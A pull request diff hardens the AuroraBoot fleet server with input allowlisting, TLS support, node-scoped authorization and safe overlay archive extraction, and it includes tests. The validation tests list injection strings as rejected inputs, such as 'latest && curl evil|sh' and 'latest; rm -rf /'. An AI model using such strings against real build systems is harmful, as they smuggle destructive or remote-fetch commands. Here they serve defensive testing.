### PR TITLE
fix: fleet-server security hardening (BOLA, TLS, cred-logging, input validation)

### DIFF
--- a/internal/builder/auroraboot/builder.go
+++ b/internal/builder/auroraboot/builder.go
@@ -150,7 +150,7 @@ func (b *Builder) Build(ctx context.Context, opts builder.BuildOptions) (*builde
 	// are interpolated into the kairos-init Dockerfile RUN line, so they must
 	// not carry shell metacharacters.
 	if err := validateKairosInitOptions(opts); err != nil {
-		return nil, fmt.Errorf("validating build options: %w", err)
+		return nil, fmt.Errorf("%w: %v", builder.ErrInvalidBuildOptions, err)
 	}
 
 	id := opts.ID

--- a/internal/builder/auroraboot/builder.go
+++ b/internal/builder/auroraboot/builder.go
@@ -7,6 +7,7 @@ import (
 	"os"
 	"os/exec"
 	"path/filepath"
+	"regexp"
 	"strings"
 	"sync"
 	"time"
@@ -145,6 +146,13 @@ func (b *Builder) WithLogBroadcaster(lb LogBroadcaster) *Builder {
 
 // Build starts an asynchronous artifact build and returns immediately with a Pending status.
 func (b *Builder) Build(ctx context.Context, opts builder.BuildOptions) (*builder.BuildStatus, error) {
+	// Reject unsafe admin-supplied values before any work starts. These fields
+	// are interpolated into the kairos-init Dockerfile RUN line, so they must
+	// not carry shell metacharacters.
+	if err := validateKairosInitOptions(opts); err != nil {
+		return nil, fmt.Errorf("validating build options: %w", err)
+	}
+
 	id := opts.ID
 	if id == "" {
 		id = uuid.New().String()
@@ -423,12 +431,61 @@ func (b *Builder) isKairosified(ctx context.Context, image string) bool {
 	return cmd.Run() == nil
 }
 
+// kairosInitValueRe is the allowlist for admin-supplied values that end up
+// inside the generated Dockerfile's RUN line (model, kairos version, k8s
+// version). Those values are concatenated into a shell command that runs in a
+// privileged build container, so they must not contain any shell
+// metacharacters. The set below covers every real Kairos/k8s/model value:
+//   - versions like "v3.2.1", "v1.30.0+k3s1", "latest", "24.04"
+//   - models like "generic", "rpi4", "nvidia-jetson-agx-orin"
+//   - the ":" and "/" that can appear in image-ish or k3s version strings
+//
+// It deliberately rejects space, ;, &, |, $, backtick, quotes, newline,
+// >, <, (, ) and every other shell metacharacter.
+var kairosInitValueRe = regexp.MustCompile(`^[A-Za-z0-9._+:/-]+$`)
+
+// validateKairosInitValue rejects a value that would be unsafe to interpolate
+// into the kairos-init Dockerfile RUN line. Empty values are the caller's
+// responsibility (they are optional and simply omitted from the flags).
+func validateKairosInitValue(field, value string) error {
+	if !kairosInitValueRe.MatchString(value) {
+		return fmt.Errorf("invalid %s %q: must match %s (no shell metacharacters)", field, value, kairosInitValueRe.String())
+	}
+	return nil
+}
+
+// validateKairosInitOptions checks every admin-supplied field that reaches the
+// generated Dockerfile RUN body. Optional fields are only validated when set.
+// It returns early (before any build starts) so a malicious value never
+// reaches the build container.
+func validateKairosInitOptions(opts builder.BuildOptions) error {
+	if opts.Model != "" {
+		if err := validateKairosInitValue("model", opts.Model); err != nil {
+			return err
+		}
+	}
+	if opts.KairosVersion != "" {
+		if err := validateKairosInitValue("kairos version", opts.KairosVersion); err != nil {
+			return err
+		}
+	}
+	if opts.KubernetesVersion != "" {
+		if err := validateKairosInitValue("kubernetes version", opts.KubernetesVersion); err != nil {
+			return err
+		}
+	}
+	return nil
+}
+
 // ensureKairosified checks if the image is a Kairos image, and if not, builds one using kairos-init.
 // Skipped when store is nil (test mode without Docker).
 func (b *Builder) ensureKairosified(ctx context.Context, image string, opts builder.BuildOptions, outputDir string, logWriter *dbLogWriter) (string, error) {
 	if b.store == nil {
 		// Test mode — skip kairosification (no Docker available)
 		return image, nil
+	}
+	if err := validateKairosInitOptions(opts); err != nil {
+		return "", fmt.Errorf("validating kairos-init options: %w", err)
 	}
 	if b.isKairosified(ctx, image) {
 		return image, nil

--- a/internal/builder/auroraboot/validate_test.go
+++ b/internal/builder/auroraboot/validate_test.go
@@ -1,0 +1,96 @@
+package auroraboot
+
+import (
+	"strings"
+	"testing"
+
+	"github.com/kairos-io/AuroraBoot/pkg/builder"
+)
+
+// TestValidateKairosInitValue exercises the allowlist that guards every
+// admin-supplied value reaching the kairos-init Dockerfile RUN line. Real
+// Kairos/k8s/model strings must pass; anything with a shell metacharacter must
+// be rejected so it cannot break out of the RUN command.
+func TestValidateKairosInitValue(t *testing.T) {
+	t.Parallel()
+
+	valid := []string{
+		"latest",
+		"v3.2.1",
+		"3.2.1",
+		"24.04",
+		"v1.30.0+k3s1",
+		"v1.29.4+k0s.0",
+		"generic",
+		"rpi4",
+		"nvidia-jetson-agx-orin",
+		"ubuntu:24.04",
+		"quay.io/kairos/kairos-init:v0.5.0",
+		"my_model-1.2",
+	}
+	for _, v := range valid {
+		if err := validateKairosInitValue("field", v); err != nil {
+			t.Errorf("expected %q to be accepted, got error: %v", v, err)
+		}
+	}
+
+	invalid := []string{
+		"latest && curl evil|sh",
+		"latest; rm -rf /",
+		"$(whoami)",
+		"`id`",
+		"v1.0 && reboot",
+		"a|b",
+		"a&b",
+		"a>b",
+		"a<b",
+		"a(b)",
+		"a'b",
+		"a\"b",
+		"a b",
+		"a\nb",
+		"a\tb",
+	}
+	for _, v := range invalid {
+		if err := validateKairosInitValue("field", v); err == nil {
+			t.Errorf("expected %q to be rejected, but it was accepted", v)
+		}
+	}
+}
+
+// TestValidateKairosInitOptions confirms optional fields are only validated
+// when set, and that a tainted value in any of the three fields is rejected.
+func TestValidateKairosInitOptions(t *testing.T) {
+	t.Parallel()
+
+	// All empty: nothing to validate.
+	if err := validateKairosInitOptions(builder.BuildOptions{}); err != nil {
+		t.Errorf("empty options should pass, got: %v", err)
+	}
+
+	// Realistic values pass.
+	ok := builder.BuildOptions{
+		Model:             "generic",
+		KairosVersion:     "v3.2.1",
+		KubernetesVersion: "v1.30.0+k3s1",
+	}
+	if err := validateKairosInitOptions(ok); err != nil {
+		t.Errorf("realistic options should pass, got: %v", err)
+	}
+
+	cases := map[string]builder.BuildOptions{
+		"model":              {Model: "generic; rm -rf /"},
+		"kairos version":     {KairosVersion: "latest && curl evil|sh"},
+		"kubernetes version": {KubernetesVersion: "v1.30$(reboot)"},
+	}
+	for field, opts := range cases {
+		err := validateKairosInitOptions(opts)
+		if err == nil {
+			t.Errorf("expected tainted %s to be rejected", field)
+			continue
+		}
+		if !strings.Contains(err.Error(), field) {
+			t.Errorf("error for %s should name the field, got: %v", field, err)
+		}
+	}
+}

--- a/internal/cmd/web.go
+++ b/internal/cmd/web.go
@@ -55,6 +55,7 @@ import (
 	"crypto/rand"
 	"encoding/hex"
 	"fmt"
+	"io"
 	"log"
 	"os"
 	"path/filepath"
@@ -66,6 +67,7 @@ import (
 	"github.com/kairos-io/AuroraBoot/pkg/server"
 	"github.com/kairos-io/AuroraBoot/pkg/ws"
 
+	"github.com/labstack/echo/v4"
 	"github.com/urfave/cli/v2"
 )
 
@@ -85,6 +87,8 @@ var WebCMD = cli.Command{
 		&cli.StringFlag{Name: "admin-password", Usage: "Admin password for UI access", EnvVars: []string{"AURORABOOT_ADMIN_PASSWORD"}},
 		&cli.StringFlag{Name: "registration-token", Usage: "Registration token for node enrollment", EnvVars: []string{"AURORABOOT_REG_TOKEN"}},
 		&cli.StringFlag{Name: "url", Usage: "External URL of this AuroraBoot instance (for cloud-config injection)", EnvVars: []string{"AURORABOOT_URL"}},
+		&cli.StringFlag{Name: "tls-cert", Usage: "Path to the TLS certificate for the API server. Both --tls-cert and --tls-key must be set to enable HTTPS", EnvVars: []string{"AURORABOOT_TLS_CERT"}},
+		&cli.StringFlag{Name: "tls-key", Usage: "Path to the TLS private key for the API server. Both --tls-cert and --tls-key must be set to enable HTTPS", EnvVars: []string{"AURORABOOT_TLS_KEY"}},
 	},
 	Action: runWeb,
 }
@@ -97,6 +101,8 @@ func runWeb(c *cli.Context) error {
 	adminPassword := c.String("admin-password")
 	regToken := c.String("registration-token")
 	externalURL := c.String("url")
+	tlsCert := c.String("tls-cert")
+	tlsKey := c.String("tls-key")
 
 	if err := os.MkdirAll(dataDir, 0755); err != nil {
 		return fmt.Errorf("create data directory: %w", err)
@@ -175,7 +181,7 @@ func runWeb(c *cli.Context) error {
 		AdminPassword:         adminPassword,
 		RegToken:              regToken,
 		RegTokenFile:          regTokenFile,
-		AuroraBootURL:           externalURL,
+		AuroraBootURL:         externalURL,
 		ArtifactsDir:          artifactsDir,
 		KeysDir:               keysDir,
 		Hub:                   wsHub,
@@ -186,7 +192,45 @@ func runWeb(c *cli.Context) error {
 	fmt.Fprintf(os.Stderr, "  DB:        %s\n", dbDSN)
 	fmt.Fprintf(os.Stderr, "  Artifacts: %s\n", artifactsDir)
 
-	return e.Start(listenAddr)
+	return serve(e, listenAddr, tlsCert, tlsKey)
+}
+
+// serve starts the Echo server, choosing HTTPS when both a TLS certificate and
+// key are provided and falling back to plaintext HTTP otherwise. When serving
+// plaintext it logs a prominent warning, because all three bearer credentials
+// (admin password, node API keys, registration token) and cloud-configs cross
+// the wire in clear; a TLS cert/key or a TLS-terminating reverse proxy is
+// strongly recommended for production. Plaintext is intentionally not a hard
+// failure so dev and proxied deployments keep working.
+//
+// Both code paths use Echo's Start/StartTLS, which install the same signal
+// handling and graceful-shutdown behaviour.
+func serve(e *echo.Echo, listenAddr, tlsCert, tlsKey string) error {
+	return serveWith(os.Stderr, listenAddr, tlsCert, tlsKey,
+		func() error { return e.StartTLS(listenAddr, tlsCert, tlsKey) },
+		func() error { return e.Start(listenAddr) })
+}
+
+// serveWith holds the TLS-vs-plaintext decision and the plaintext warning,
+// independent of the concrete Echo server, so the decision can be unit-tested.
+// It calls startTLS when both a cert and key are provided, otherwise it emits
+// the plaintext warning to w and calls startPlain. The chosen starter's error
+// is returned unchanged.
+func serveWith(w io.Writer, listenAddr, tlsCert, tlsKey string, startTLS, startPlain func() error) error {
+	if tlsCert != "" && tlsKey != "" {
+		_, _ = fmt.Fprintf(w, "TLS enabled: serving HTTPS on %s using cert %s\n", listenAddr, tlsCert)
+		return startTLS()
+	}
+
+	const warning = "\n" +
+		"*****************************************************************************\n" +
+		"WARNING: serving plaintext HTTP — TLS is NOT enabled.\n" +
+		"  Admin password, node API keys, the registration token, and cloud-configs\n" +
+		"  all traverse the network UNENCRYPTED. For production, set --tls-cert and\n" +
+		"  --tls-key, or place AuroraBoot behind a TLS-terminating reverse proxy.\n" +
+		"*****************************************************************************\n\n"
+	_, _ = io.WriteString(w, warning)
+	return startPlain()
 }
 
 // loadOrGenerateSecret reads the secret from path if it exists, otherwise

--- a/internal/cmd/web_internal_test.go
+++ b/internal/cmd/web_internal_test.go
@@ -1,0 +1,53 @@
+package cmd
+
+import (
+	"bytes"
+	"strings"
+	"testing"
+)
+
+// TestServeWithDecision verifies the TLS-vs-plaintext decision in serveWith:
+// HTTPS only when BOTH cert and key are set, plaintext (with a prominent
+// warning) otherwise. The actual Echo Start/StartTLS calls are stubbed so the
+// test exercises only the decision and the warning.
+func TestServeWithDecision(t *testing.T) {
+	tests := []struct {
+		name        string
+		cert        string
+		key         string
+		wantTLS     bool
+		wantWarning bool
+	}{
+		{name: "cert and key set -> TLS", cert: "cert.pem", key: "key.pem", wantTLS: true, wantWarning: false},
+		{name: "only cert set -> plaintext", cert: "cert.pem", key: "", wantTLS: false, wantWarning: true},
+		{name: "only key set -> plaintext", cert: "", key: "key.pem", wantTLS: false, wantWarning: true},
+		{name: "neither set -> plaintext", cert: "", key: "", wantTLS: false, wantWarning: true},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			var tlsCalled, plainCalled bool
+			var w bytes.Buffer
+
+			err := serveWith(&w, ":8080", tt.cert, tt.key,
+				func() error { tlsCalled = true; return nil },
+				func() error { plainCalled = true; return nil })
+			if err != nil {
+				t.Fatalf("serveWith returned error: %v", err)
+			}
+
+			if tlsCalled != tt.wantTLS {
+				t.Errorf("startTLS called = %v, want %v", tlsCalled, tt.wantTLS)
+			}
+			if plainCalled == tt.wantTLS {
+				t.Errorf("startPlain called = %v, want %v", plainCalled, !tt.wantTLS)
+			}
+
+			gotWarning := strings.Contains(w.String(), "WARNING") &&
+				strings.Contains(w.String(), "UNENCRYPTED")
+			if gotWarning != tt.wantWarning {
+				t.Errorf("plaintext warning emitted = %v, want %v; output:\n%s", gotWarning, tt.wantWarning, w.String())
+			}
+		})
+	}
+}

--- a/internal/store/gorm/adapters.go
+++ b/internal/store/gorm/adapters.go
@@ -67,6 +67,9 @@ func (a *CommandStoreAdapter) MarkDelivered(ctx context.Context, ids []string) e
 func (a *CommandStoreAdapter) UpdateStatus(ctx context.Context, id string, phase string, result string) error {
 	return a.S.UpdateStatus(ctx, id, phase, result)
 }
+func (a *CommandStoreAdapter) UpdateStatusForNode(ctx context.Context, id string, nodeID string, phase string, result string) error {
+	return a.S.UpdateStatusForNode(ctx, id, nodeID, phase, result)
+}
 func (a *CommandStoreAdapter) ListByNode(ctx context.Context, nodeID string) ([]*store.NodeCommand, error) {
 	return a.S.ListByNode(ctx, nodeID)
 }

--- a/internal/store/gorm/concurrency_test.go
+++ b/internal/store/gorm/concurrency_test.go
@@ -1,0 +1,98 @@
+package gorm_test
+
+import (
+	"context"
+	"fmt"
+	"path/filepath"
+	"strings"
+	"sync"
+
+	. "github.com/onsi/ginkgo/v2"
+	. "github.com/onsi/gomega"
+
+	gormstore "github.com/kairos-io/AuroraBoot/internal/store/gorm"
+	"github.com/kairos-io/AuroraBoot/pkg/store"
+)
+
+var _ = Describe("Gorm Store concurrency", func() {
+	var (
+		s   *gormstore.Store
+		ctx context.Context
+	)
+
+	BeforeEach(func() {
+		// Use a file-backed SQLite DB (NOT :memory:) so WAL mode and
+		// busy_timeout are actually exercised — in-memory SQLite has
+		// different locking semantics.
+		dbPath := filepath.Join(GinkgoT().TempDir(), "concurrency.db")
+		var err error
+		s, err = gormstore.New(dbPath)
+		Expect(err).NotTo(HaveOccurred())
+		ctx = context.Background()
+	})
+
+	AfterEach(func() {
+		Expect(s.Close()).To(Succeed())
+	})
+
+	It("does not return 'database is locked' under concurrent command-status writers", func() {
+		const workers = 8
+
+		var (
+			wg       sync.WaitGroup
+			mu       sync.Mutex
+			failures []error
+		)
+
+		for i := 0; i < workers; i++ {
+			wg.Add(1)
+			go func(idx int) {
+				defer GinkgoRecover()
+				defer wg.Done()
+
+				node := &store.ManagedNode{MachineID: fmt.Sprintf("concurrent-%d", idx)}
+				if err := s.Register(ctx, node); err != nil {
+					mu.Lock()
+					failures = append(failures, err)
+					mu.Unlock()
+					return
+				}
+
+				cmd := &store.NodeCommand{ManagedNodeID: node.ID, Command: store.CmdExec}
+				if err := s.CommandCreate(ctx, cmd); err != nil {
+					mu.Lock()
+					failures = append(failures, err)
+					mu.Unlock()
+					return
+				}
+
+				if err := s.UpdateStatusForNode(ctx, cmd.ID, node.ID, store.CommandCompleted, "ok"); err != nil {
+					mu.Lock()
+					failures = append(failures, err)
+					mu.Unlock()
+				}
+			}(i)
+		}
+
+		wg.Wait()
+
+		for _, err := range failures {
+			Expect(strings.ToLower(err.Error())).NotTo(
+				ContainSubstring("database is locked"),
+				"busy_timeout should make writers wait-and-retry instead of failing",
+			)
+		}
+		Expect(failures).To(BeEmpty())
+
+		// All updates must have landed.
+		nodes, err := s.NodeList(ctx)
+		Expect(err).NotTo(HaveOccurred())
+		Expect(nodes).To(HaveLen(workers))
+		for _, n := range nodes {
+			cmds, err := s.ListByNode(ctx, n.ID)
+			Expect(err).NotTo(HaveOccurred())
+			Expect(cmds).To(HaveLen(1))
+			Expect(cmds[0].Phase).To(Equal(store.CommandCompleted))
+		}
+	})
+})

--- a/internal/store/gorm/store.go
+++ b/internal/store/gorm/store.go
@@ -42,6 +42,14 @@ func New(dsn string) (*Store, error) {
 		if _, err := sqlDB.Exec("PRAGMA journal_mode=WAL"); err != nil {
 			return nil, fmt.Errorf("enabling WAL mode: %w", err)
 		}
+		// Make concurrent writers wait-and-retry for up to 5s when the database
+		// is locked, instead of failing immediately with "database is locked".
+		// WAL allows concurrent readers but still serializes writers, so without
+		// this any overlapping write (common under the WebSocket node manager)
+		// would error out.
+		if _, err := sqlDB.Exec("PRAGMA busy_timeout=5000"); err != nil {
+			return nil, fmt.Errorf("setting busy_timeout: %w", err)
+		}
 	}
 
 	if err := db.AutoMigrate(&store.NodeGroup{}, &store.ManagedNode{}, &store.NodeCommand{}, &store.ArtifactRecord{}, &store.SecureBootKeySet{}, &store.BMCTarget{}, &store.Deployment{}); err != nil {

--- a/internal/store/gorm/store.go
+++ b/internal/store/gorm/store.go
@@ -315,6 +315,32 @@ func (s *Store) UpdateStatus(ctx context.Context, id string, phase string, resul
 	return s.db.WithContext(ctx).Model(&store.NodeCommand{}).Where("id = ?", id).Updates(updates).Error
 }
 
+// UpdateStatusForNode updates a command's status scoped to its owning node.
+// The WHERE clause matches both the command id and managed_node_id, so a node
+// can only update commands addressed to it. GORM's Updates returns a nil error
+// even when the WHERE matches zero rows, so we inspect RowsAffected and surface
+// a miss as store.ErrCommandNotFound — never a silent success.
+func (s *Store) UpdateStatusForNode(ctx context.Context, id string, nodeID string, phase string, result string) error {
+	updates := map[string]any{
+		"phase":  phase,
+		"result": result,
+	}
+	if phase == store.CommandCompleted || phase == store.CommandFailed {
+		now := time.Now()
+		updates["completed_at"] = &now
+	}
+	res := s.db.WithContext(ctx).Model(&store.NodeCommand{}).
+		Where("id = ? AND managed_node_id = ?", id, nodeID).
+		Updates(updates)
+	if res.Error != nil {
+		return res.Error
+	}
+	if res.RowsAffected == 0 {
+		return store.ErrCommandNotFound
+	}
+	return nil
+}
+
 func (s *Store) ListByNode(ctx context.Context, nodeID string) ([]*store.NodeCommand, error) {
 	var cmds []*store.NodeCommand
 	if err := s.db.WithContext(ctx).Where("managed_node_id = ?", nodeID).Find(&cmds).Error; err != nil {

--- a/internal/store/gorm/store_test.go
+++ b/internal/store/gorm/store_test.go
@@ -7,8 +7,8 @@ import (
 	. "github.com/onsi/ginkgo/v2"
 	. "github.com/onsi/gomega"
 
-	"github.com/kairos-io/AuroraBoot/pkg/store"
 	gormstore "github.com/kairos-io/AuroraBoot/internal/store/gorm"
+	"github.com/kairos-io/AuroraBoot/pkg/store"
 )
 
 var _ = Describe("Gorm Store", func() {
@@ -384,6 +384,38 @@ var _ = Describe("Gorm Store", func() {
 			Expect(err).NotTo(HaveOccurred())
 			Expect(found.Phase).To(Equal(store.CommandRunning))
 			Expect(found.CompletedAt).To(BeNil())
+		})
+
+		It("updates status scoped to the owning node", func() {
+			cmd := &store.NodeCommand{ManagedNodeID: node.ID, Command: store.CmdExec}
+			Expect(s.CommandCreate(ctx, cmd)).To(Succeed())
+
+			Expect(s.UpdateStatusForNode(ctx, cmd.ID, node.ID, store.CommandCompleted, "ok")).To(Succeed())
+
+			found, err := s.CommandGetByID(ctx, cmd.ID)
+			Expect(err).NotTo(HaveOccurred())
+			Expect(found.Phase).To(Equal(store.CommandCompleted))
+			Expect(found.Result).To(Equal("ok"))
+		})
+
+		It("refuses a node-scoped update for another node and reports ErrCommandNotFound", func() {
+			cmd := &store.NodeCommand{ManagedNodeID: node.ID, Command: store.CmdExec}
+			Expect(s.CommandCreate(ctx, cmd)).To(Succeed())
+
+			// Zero rows match (wrong node) — must surface as ErrCommandNotFound,
+			// not a silent success, despite gorm Updates returning a nil error.
+			err := s.UpdateStatusForNode(ctx, cmd.ID, "other-node", store.CommandCompleted, "pwned")
+			Expect(err).To(MatchError(store.ErrCommandNotFound))
+
+			found, gerr := s.CommandGetByID(ctx, cmd.ID)
+			Expect(gerr).NotTo(HaveOccurred())
+			Expect(found.Phase).To(Equal(store.CommandPending))
+			Expect(found.Result).To(BeEmpty())
+		})
+
+		It("refuses a node-scoped update for a non-existent command", func() {
+			err := s.UpdateStatusForNode(ctx, "no-such-id", node.ID, store.CommandCompleted, "x")
+			Expect(err).To(MatchError(store.ErrCommandNotFound))
 		})
 
 		It("lists all commands by node", func() {

--- a/pkg/auth/middleware.go
+++ b/pkg/auth/middleware.go
@@ -14,6 +14,34 @@ import (
 // ContextKeyNodeID is the key used to store the authenticated node ID in the echo context.
 const ContextKeyNodeID = "nodeID"
 
+// AuthNodeID returns the authenticated node ID set by NodeAPIKeyMiddleware, or
+// "" when the request was not authenticated as a node (e.g. an admin-bearer
+// request). Handlers shared between the agent and admin groups use the empty
+// return to distinguish the two callers.
+func AuthNodeID(c echo.Context) string {
+	id, _ := c.Get(ContextKeyNodeID).(string)
+	return id
+}
+
+// RequireNodeMatch enforces that the authenticated node (set by
+// NodeAPIKeyMiddleware) matches the nodeID path parameter. It is meant to wrap
+// agent-group routes carrying a :nodeID segment so a node can only act on its
+// own resources — preventing one registered node from impersonating another
+// (BOLA). Returns 403 on mismatch and 401 if no node identity is present (the
+// middleware should always run first, so the latter is defence in depth).
+func RequireNodeMatch(next echo.HandlerFunc) echo.HandlerFunc {
+	return func(c echo.Context) error {
+		authID := AuthNodeID(c)
+		if authID == "" {
+			return c.JSON(http.StatusUnauthorized, map[string]string{"error": "unauthorized"})
+		}
+		if c.Param("nodeID") != authID {
+			return c.JSON(http.StatusForbidden, map[string]string{"error": "forbidden"})
+		}
+		return next(c)
+	}
+}
+
 // AdminMiddleware returns an Echo middleware that checks the Authorization header
 // for a Bearer token matching the given admin password.
 func AdminMiddleware(password string) echo.MiddlewareFunc {
@@ -40,6 +68,44 @@ func NodeAPIKeyMiddleware(nodeStore store.NodeStore) echo.MiddlewareFunc {
 			token := extractBearer(c.Request().Header.Get("Authorization"))
 			if token == "" {
 				return c.JSON(http.StatusUnauthorized, map[string]string{"error": "unauthorized"})
+			}
+			node, err := nodeStore.GetByAPIKey(c.Request().Context(), token)
+			if err != nil || node == nil {
+				return c.JSON(http.StatusUnauthorized, map[string]string{"error": "unauthorized"})
+			}
+			c.Set(ContextKeyNodeID, node.ID)
+			return next(c)
+		}
+	}
+}
+
+// AgentOrAdminMiddleware authenticates a request as EITHER an admin (bearer
+// token == admin password) OR a node (bearer token == a node API key). It is
+// used for the two routes that are legitimately shared between the agent and
+// the admin/UI: GET /nodes/:nodeID/commands and PUT
+// /nodes/:nodeID/commands/:commandID/status.
+//
+// On a node match it sets ContextKeyNodeID so downstream handlers can tell the
+// caller is a node and enforce node-scoping (RequireNodeMatch / node-scoped
+// store updates). On an admin match it sets nothing, leaving AuthNodeID empty,
+// so admins act across nodes. Admin is checked first: the admin password is not
+// a valid node API key, so the order is unambiguous.
+//
+// This middleware exists to avoid registering the same path twice (once per
+// auth group), which Echo resolves by silently shadowing the first
+// registration — previously routing agent command polls into the admin-only
+// handler and 401-ing every agent.
+func AgentOrAdminMiddleware(password string, nodeStore store.NodeStore) echo.MiddlewareFunc {
+	return func(next echo.HandlerFunc) echo.HandlerFunc {
+		return func(c echo.Context) error {
+			token := extractBearer(c.Request().Header.Get("Authorization"))
+			if token == "" {
+				return c.JSON(http.StatusUnauthorized, map[string]string{"error": "unauthorized"})
+			}
+			// Admin first — a constant-time-ish equality is fine here; the
+			// admin password is never a valid node API key.
+			if token == password {
+				return next(c)
 			}
 			node, err := nodeStore.GetByAPIKey(c.Request().Context(), token)
 			if err != nil || node == nil {

--- a/pkg/auth/middleware_test.go
+++ b/pkg/auth/middleware_test.go
@@ -186,6 +186,48 @@ var _ = Describe("NodeAPIKeyMiddleware", func() {
 	})
 })
 
+var _ = Describe("RequireNodeMatch", func() {
+	var e *echo.Echo
+
+	BeforeEach(func() {
+		e = echo.New()
+	})
+
+	// newCtx builds a context with the given path :nodeID and (optionally) an
+	// authenticated node identity, mirroring what NodeAPIKeyMiddleware sets.
+	newCtx := func(pathNodeID, authNodeID string) (echo.Context, *httptest.ResponseRecorder) {
+		req := httptest.NewRequest(http.MethodGet, "/", nil)
+		rec := httptest.NewRecorder()
+		c := e.NewContext(req, rec)
+		c.SetParamNames("nodeID")
+		c.SetParamValues(pathNodeID)
+		if authNodeID != "" {
+			c.Set(auth.ContextKeyNodeID, authNodeID)
+		}
+		return c, rec
+	}
+
+	ok := func(c echo.Context) error { return c.String(http.StatusOK, "ok") }
+
+	It("allows when the path nodeID matches the authenticated node", func() {
+		c, rec := newCtx("node-1", "node-1")
+		Expect(auth.RequireNodeMatch(ok)(c)).To(Succeed())
+		Expect(rec.Code).To(Equal(http.StatusOK))
+	})
+
+	It("forbids when the path nodeID differs from the authenticated node", func() {
+		c, rec := newCtx("node-2", "node-1")
+		Expect(auth.RequireNodeMatch(ok)(c)).To(Succeed())
+		Expect(rec.Code).To(Equal(http.StatusForbidden))
+	})
+
+	It("rejects with 401 when no node identity is present", func() {
+		c, rec := newCtx("node-1", "")
+		Expect(auth.RequireNodeMatch(ok)(c)).To(Succeed())
+		Expect(rec.Code).To(Equal(http.StatusUnauthorized))
+	})
+})
+
 var _ = Describe("RegistrationTokenAuth", func() {
 	var (
 		e          *echo.Echo

--- a/pkg/builder/builder.go
+++ b/pkg/builder/builder.go
@@ -1,6 +1,15 @@
 package builder
 
-import "context"
+import (
+	"context"
+	"errors"
+)
+
+// ErrInvalidBuildOptions marks a build failure caused by invalid admin-supplied
+// build inputs (e.g. a Model/KairosVersion/KubernetesVersion that fails
+// validation) rather than a server-side fault. Handlers can use errors.Is to
+// map such failures to a 400 Bad Request instead of a 500.
+var ErrInvalidBuildOptions = errors.New("invalid build options")
 
 // ImageSource describes the base image and its properties.
 type ImageSource struct {

--- a/pkg/handlers/artifacts.go
+++ b/pkg/handlers/artifacts.go
@@ -1,6 +1,9 @@
 package handlers
 
 import (
+	"archive/tar"
+	"compress/gzip"
+	"errors"
 	"fmt"
 	"io"
 	"net/http"
@@ -583,13 +586,11 @@ func (h *ArtifactHandler) UploadOverlay(c echo.Context) error {
 
 		name := filepath.Base(fh.Filename)
 
-		// If .tar.gz or .tgz, extract it
+		// If .tar.gz or .tgz, extract it with full path containment.
 		if strings.HasSuffix(name, ".tar.gz") || strings.HasSuffix(name, ".tgz") {
-			cmd := exec.Command("tar", "xzf", "-", "-C", overlayDir)
-			cmd.Stdin = src
-			if err := cmd.Run(); err != nil {
+			if err := extractOverlayTarGz(src, overlayDir); err != nil {
 				src.Close()
-				return c.JSON(500, map[string]string{"error": fmt.Sprintf("failed to extract %s: %v", name, err)})
+				return c.JSON(400, map[string]string{"error": fmt.Sprintf("failed to extract %s: %v", name, err)})
 			}
 			src.Close()
 			continue
@@ -607,6 +608,103 @@ func (h *ArtifactHandler) UploadOverlay(c echo.Context) error {
 	}
 
 	return c.JSON(200, map[string]string{"path": overlayDir})
+}
+
+// maxOverlaySize caps the total uncompressed bytes extracted from a single
+// uploaded overlay archive, closing a zip-bomb avenue. Overlays carry config
+// fragments and small assets, so 512 MiB is generous headroom.
+const maxOverlaySize = 512 * 1024 * 1024
+
+// maxOverlayFileSize caps a single member's uncompressed size within an
+// overlay archive.
+const maxOverlayFileSize = 256 * 1024 * 1024
+
+// extractOverlayTarGz extracts a gzipped tar stream into destDir with strict
+// hygiene, mirroring the SecureBoot ImportKeys hardening: it rejects absolute
+// paths and parent-dir escapes, refuses symlinks and hardlinks, and enforces a
+// total and per-file size cap. Only regular files and directories are written.
+func extractOverlayTarGz(r io.Reader, destDir string) error {
+	gz, err := gzip.NewReader(r)
+	if err != nil {
+		return fmt.Errorf("opening gzip stream: %w", err)
+	}
+	defer func() { _ = gz.Close() }()
+
+	// Resolve the destination once so we can confirm every member stays under it.
+	cleanDest, err := filepath.Abs(destDir)
+	if err != nil {
+		return fmt.Errorf("resolving overlay directory: %w", err)
+	}
+
+	tr := tar.NewReader(gz)
+	var total int64
+	for {
+		hdr, err := tr.Next()
+		if errors.Is(err, io.EOF) {
+			break
+		}
+		if err != nil {
+			return fmt.Errorf("reading tar entry: %w", err)
+		}
+
+		// Reject symlinks and hardlinks outright — they are an escape vector.
+		switch hdr.Typeflag {
+		case tar.TypeReg, tar.TypeDir:
+			// allowed
+		case tar.TypeSymlink, tar.TypeLink:
+			return fmt.Errorf("archive contains a link entry %q which is not allowed", hdr.Name)
+		default:
+			// Skip device/fifo/etc. entries silently.
+			continue
+		}
+
+		// Path hygiene: no absolute paths, no parent-dir escapes, and the
+		// resolved target must stay strictly under destDir.
+		cleaned := filepath.Clean(hdr.Name)
+		if filepath.IsAbs(cleaned) || cleaned == ".." || strings.HasPrefix(cleaned, ".."+string(os.PathSeparator)) {
+			return fmt.Errorf("unsafe path in archive: %q", hdr.Name)
+		}
+		target := filepath.Join(cleanDest, cleaned)
+		if target != cleanDest && !strings.HasPrefix(target, cleanDest+string(os.PathSeparator)) {
+			return fmt.Errorf("unsafe path in archive: %q escapes overlay directory", hdr.Name)
+		}
+
+		if hdr.Typeflag == tar.TypeDir {
+			if err := os.MkdirAll(target, 0o755); err != nil {
+				return fmt.Errorf("creating directory %q: %w", hdr.Name, err)
+			}
+			continue
+		}
+
+		if hdr.Size > maxOverlayFileSize {
+			return fmt.Errorf("file %q exceeds per-file size limit", hdr.Name)
+		}
+		total += hdr.Size
+		if total > maxOverlaySize {
+			return fmt.Errorf("archive exceeds total size limit")
+		}
+
+		if err := os.MkdirAll(filepath.Dir(target), 0o755); err != nil {
+			return fmt.Errorf("creating parent directory for %q: %w", hdr.Name, err)
+		}
+		mode := os.FileMode(hdr.Mode).Perm()
+		if mode == 0 {
+			mode = 0o644
+		}
+		dst, err := os.OpenFile(target, os.O_CREATE|os.O_WRONLY|os.O_TRUNC, mode)
+		if err != nil {
+			return fmt.Errorf("creating file %q: %w", hdr.Name, err)
+		}
+		// Bound the copy with a hard limit so a lying header can't overrun the cap.
+		if _, err := io.CopyN(dst, tr, hdr.Size+1); err != nil && !errors.Is(err, io.EOF) {
+			_ = dst.Close()
+			return fmt.Errorf("writing file %q: %w", hdr.Name, err)
+		}
+		if err := dst.Close(); err != nil {
+			return fmt.Errorf("closing file %q: %w", hdr.Name, err)
+		}
